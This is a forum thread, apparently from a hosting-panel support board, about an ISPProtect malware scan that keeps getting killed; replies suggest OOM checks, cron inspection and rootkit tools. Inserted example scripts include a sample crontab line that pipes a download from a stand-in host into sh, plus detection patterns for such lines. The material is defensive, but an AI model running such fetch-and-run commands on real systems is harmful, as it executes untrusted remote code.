Scan the website for malware, e.g. with ISPProtect (https://ispprotect.com/). The first scan is free, no registration required.
I bought the script because I have already used it in the past, but stopped before ending...
Code:
Please enter path to scan: /var
Starting scan. This can take a long, long time depending on the server hardware and the amount of files ...
!!! DO NOT INTERRUPT THE SCRIPT !!!!
After the scan is completed, you will find the results also in the following files:
Malware => /tmp/found_malware_202405141030th.txt
Wordpress => /tmp/software_wordpress_202405141030th.txt
Joomla => /tmp/software_joomla_202405141030th.txt
Drupal => /tmp/software_drupal_202405141030th.txt
Mediawiki => /tmp/software_mediawiki_202405141030th.txt
Contao => /tmp/software_contao_202405141030th.txt
Magentocommerce => /tmp/software_magentocommerce_202405141030th.txt
Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405141030th.txt
Cms Made Simple => /tmp/software_cms_made_simple_202405141030th.txt
Phpmyadmin => /tmp/software_phpmyadmin_202405141030th.txt
Typo3 => /tmp/software_typo3_202405141030th.txt
Roundcube => /tmp/software_roundcube_202405141030th.txt
Shopware => /tmp/software_shopware_202405141030th.txt
Mysqldumper => /tmp/software_mysqldumper_202405141030th.txt
Prestashop => /tmp/software_prestashop_202405141030th.txt
File system scan completed, found 326645 files to consider.
Starting scan level 1 ...
Scanning 326645 files now ...
Scan level 1 completed. 0 hits.
Starting scan level 1.1 ...
Scanning 112606 files now ...
Scan level 1.1 completed. 0 hits.
Read 61734 whitelist signatures ...
Starting scan level 2 ...
Scanning 81042 files now ...
Scan level 2: 5,876/81,042 (7%) completed. 1 hits. [ETA 01:16:32]
./ispp_scan: line 220: 9423 Killed $PHP -n -c ${DIR}/ispp_php.ini -q ${DIR}/ispp_scan.php "$@"
root@srv:/tmp#
Strange that script exits before scanning everything. Did you use the old script from previous scans or did you download the latest version? Script says it found 1 hit, did you read all the *.txt files in /tmp/ to see if there is info on what it found?
I executed it again:
Code:
cd /tmp
wget https://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
./ispp_scan

I have read all txt files, nothing included.
I assume this means that the process or a subprocess got killed. Check the syslog of the system to see if the process may have been OOM-killed.
Try scanning only the web7 website, that should finish sooner. Check cron files, malware tends to put in cron script that installs malware back if it gets removed.
Code:
ls -l /var/spool/cron/crontabs/

To find Out Of Memory messages like @pyte suggested, try
Code:
grep -i oom /var/log/syslog
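A more precise form of the OOM check suggested above, written as an added example that is not part of the thread or of ISPProtect: it matches the kernel's "Killed process" record for one specific PID and separates a host-wide OOM kill from a memory-cgroup limit. The function name, the sample log lines and the PIDs in them are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify a kill from kernel log text.
# Constructed sample lines in the format the kernel OOM killer writes.
SAMPLE_LOG='May 14 11:02:10 srv kernel: [ 1000.000001] php invoked oom-killer: gfp_mask=0x100cca, order=0, oom_score_adj=0
May 14 11:02:10 srv kernel: [ 1000.000002] Out of memory: Killed process 4242 (php) total-vm:2097152kB, anon-rss:1835008kB, file-rss:0kB, shmem-rss:0kB
May 14 11:05:00 srv kernel: [ 1170.000001] Memory cgroup out of memory: Killed process 5151 (php) total-vm:1048576kB, anon-rss:524288kB, file-rss:0kB, shmem-rss:0kB'

# classify_kill <pid> <kernel-log-text>
# Prints oom-cgroup, oom-global or no-oom-record.
classify_kill() {
    pid=$1
    log=$2
    case $pid in
        ''|*[!0-9]*) echo "classify_kill: PID must be numeric" >&2; return 2 ;;
    esac
    # "Kill(ed)?" covers the older "Kill process N" and newer "Killed process N" wording.
    # The trailing " \(" prevents PID 42 from matching PID 4242.
    if printf '%s\n' "$log" | grep -Eq "Memory cgroup out of memory: Kill(ed)? process ${pid} \("; then
        echo "oom-cgroup"       # a container or service memory limit was hit
    elif printf '%s\n' "$log" | grep -Eq "Out of memory: Kill(ed)? process ${pid} \("; then
        echo "oom-global"       # the whole machine ran out of memory
    else
        echo "no-oom-record"    # SIGKILL came from somewhere else, or the log is elsewhere
    fi
}

# Demonstration on the constructed sample.
for p in 4242 5151 7777; do
    printf '%s\t%s\n' "$p" "$(classify_kill "$p" "$SAMPLE_LOG")"
done

# Live use with the PID that bash printed next to "Killed":
#   classify_kill 9423 "$(journalctl -k --no-pager 2>/dev/null || dmesg)"
```

If the server is a container guest (for example LXC under Proxmox), the kernel log lives on the host, so a "no-oom-record" result inside the guest does not rule out an OOM kill.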
no out of memory messages....
Better but not enough
Code:
Please enter path to scan: /var/www/clients/client0/web7/
Starting scan. This can take a long, long time depending on the server hardware and the amount of files ...
!!! DO NOT INTERRUPT THE SCRIPT !!!!
After the scan is completed, you will find the results also in the following files:
Malware => /tmp/found_malware_202405141753th.txt
Wordpress => /tmp/software_wordpress_202405141753th.txt
Joomla => /tmp/software_joomla_202405141753th.txt
Drupal => /tmp/software_drupal_202405141753th.txt
Mediawiki => /tmp/software_mediawiki_202405141753th.txt
Contao => /tmp/software_contao_202405141753th.txt
Magentocommerce => /tmp/software_magentocommerce_202405141753th.txt
Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405141753th.txt
Cms Made Simple => /tmp/software_cms_made_simple_202405141753th.txt
Phpmyadmin => /tmp/software_phpmyadmin_202405141753th.txt
Typo3 => /tmp/software_typo3_202405141753th.txt
Roundcube => /tmp/software_roundcube_202405141753th.txt
Shopware => /tmp/software_shopware_202405141753th.txt
Mysqldumper => /tmp/software_mysqldumper_202405141753th.txt
Prestashop => /tmp/software_prestashop_202405141753th.txt
File system scan completed, found 276974 files to consider.
Starting scan level 1 ...
Scanning 276974 files now ...
Scan level 1 completed. 0 hits.
Starting scan level 1.1 ...
Scanning 111565 files now ...
Message from syslogd@srv at May 14 20:59:45 ...
kernel:[172902.520597] Uhhuh. NMI received for unknown reason 30 on CPU 0.
Message from syslogd@srv at May 14 20:59:45 ...
kernel:[172902.520601] Do you have a strange power saving mode enabled?
Message from syslogd@srv at May 14 20:59:45 ...
kernel:[172902.520602] Dazed and confused, but trying to continue
Scan level 1.1 completed. 0 hits.
Read 61734 whitelist signatures ...
Starting scan level 2 ...
Scanning 78107 files now ...
Scan level 2: 72,381/78,107 (93%) completed. 1 hits. [ETA 00:01:54]
./ispp_scan: line 220: 6996 Killed $PHP -n -c ${DIR}/ispp_php.ini -q ${DIR}/ispp_scan.php "$@"
root@srv:/tmp#

Check cron files, malware tends to put in cron script that installs malware back if it gets removed.
Code:
ls -l /var/spool/cron/crontabs/

nothing suspicious on it
Code:
root@srv:/tmp# ls -l /var/spool/cron/crontabs/
total 16
-rw------- 1 web7 crontab 201 Oct 5 2021 defaultdiavgiagr
-rw------- 1 diavgia crontab 253 Mar 29 14:48 diavgia
-rw------- 1 getmail crontab 299 Mar 28 10:53 getmail
-rw------- 1 web7 crontab 847 May 14 10:36 web7
root@srv:/tmp#
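A directory listing shows only owners, sizes and modification times, so the cron check suggested in this thread also needs a look at what each crontab contains. The following is an added example, not part of the thread: the function name, the three heuristic patterns and the sample crontab (including its paths and the example.invalid host) are constructed for illustration and are not a complete signature set.

```shell
#!/bin/sh
# Added example: flag crontab entries that deserve a manual look.

# Constructed sample crontab for a web user.
SAMPLE_CRONTAB='# constructed sample
MAILTO=""
*/5 * * * * /usr/bin/php /var/www/example/cron.php
*/10 * * * * curl -fsS http://example.invalid/u | sh
@reboot /dev/shm/.x/run >/dev/null 2>&1'

# Reads crontab text on stdin, prints "reason<TAB>line" for each flagged entry.
flag_cron_lines() {
    while IFS= read -r line; do
        case $line in
            ''|'#'*) continue ;;    # skip blank lines and comments
        esac
        if printf '%s\n' "$line" | grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh'; then
            reason=download-piped-to-shell
        elif printf '%s\n' "$line" | grep -Eq 'base64[[:space:]]+(-d|--decode)'; then
            reason=decodes-base64
        elif printf '%s\n' "$line" | grep -Eq '(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)/'; then
            reason=runs-from-world-writable-dir
        else
            continue
        fi
        printf '%s\t%s\n' "$reason" "$line"
    done
}

# Demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines

# Live use as root over the directory listed above:
#   for f in /var/spool/cron/crontabs/*; do
#       echo "== $f"; flag_cron_lines < "$f"
#   done
```

An empty result only means none of the three patterns matched; a recently modified crontab is still worth reading in full.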
This is strange. The NMI watchdog seems to have some issues; either disable it or set the C-states in the BIOS to another setting (if it is a hardware server). However, this issue will only occur when the system is under quite some load. Are you sure that you don't run out of memory while the scan is running? Maybe check the system resources with something like htop while the scan is running. You are using Proxmox, so you might check out this: https://forum.proxmox.com/threads/uhhuh-nmi-received-for-unknown-reason-on-amd-epyc.48866/
Yes, I am sure. I ran the script a third time while watching the top and the memory remained low. I have spent a lot of time, unfortunately without any result. My knowledge is limited and maybe it's my fault that I can't describe it properly or solve it easily.
Code:
!!! DO NOT INTERRUPT THE SCRIPT !!!!
After the scan is completed, you will find the results also in the following files:
Malware => /tmp/found_malware_202405150900th.txt
Wordpress => /tmp/software_wordpress_202405150900th.txt
Joomla => /tmp/software_joomla_202405150900th.txt
Drupal => /tmp/software_drupal_202405150900th.txt
Mediawiki => /tmp/software_mediawiki_202405150900th.txt
Contao => /tmp/software_contao_202405150900th.txt
Magentocommerce => /tmp/software_magentocommerce_202405150900th.txt
Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405150900th.txt
Cms Made Simple => /tmp/software_cms_made_simple_202405150900th.txt
Phpmyadmin => /tmp/software_phpmyadmin_202405150900th.txt
Typo3 => /tmp/software_typo3_202405150900th.txt
Roundcube => /tmp/software_roundcube_202405150900th.txt
Shopware => /tmp/software_shopware_202405150900th.txt
Mysqldumper => /tmp/software_mysqldumper_202405150900th.txt
Prestashop => /tmp/software_prestashop_202405150900th.txt
File system scan completed, found 294565 files to consider.
Starting scan level 1 ...
Scanning 294565 files now ...
Scan level 1 completed. 0 hits.
Starting scan level 1.1 ...
Scanning 111565 files now ...
Scan level 1.1 completed. 0 hits.
Read 61734 whitelist signatures ...
Starting scan level 2 ...
Scanning 78450 files now ...
Scan level 2: 10,371/78,450 (13%) completed. 1 hits. [ETA 01:04:59]
./ispp_scan: line 220: 2138 Killed $PHP -n -c ${DIR}/ispp_php.ini -q ${DIR}/ispp_scan.php "$@"
root@srv:/tmp#
Well, I don't know the tool, but the output gives some hints: I would assume that whatever is happening on line 220 in ispp_scan is causing a process to be killed. And if I understand the output correctly, then it kills the "ispp_scan.php". But like I said, I'm not familiar with the script, so no clue what is causing this.
It might be time to hire help. ISPConfig Business support for example, https://www.ispconfig.org/support/ Or what is running on website web7? If it is Wordpress, there are services that remove malware from Wordpress sites. Try to find a local or nearby malware removal service.
Yes, something is externally killing the scan process. This can either be caused by a resource shortage like running out of RAM, as mentioned already, or maybe the system is infected by a rootkit, which kills the malware scan.
Common tools for rootkit detection are: chkrootkit, rkhunter, lynis (https://www.howtoforge.com/performing-linux-system-audit-with-lynis/)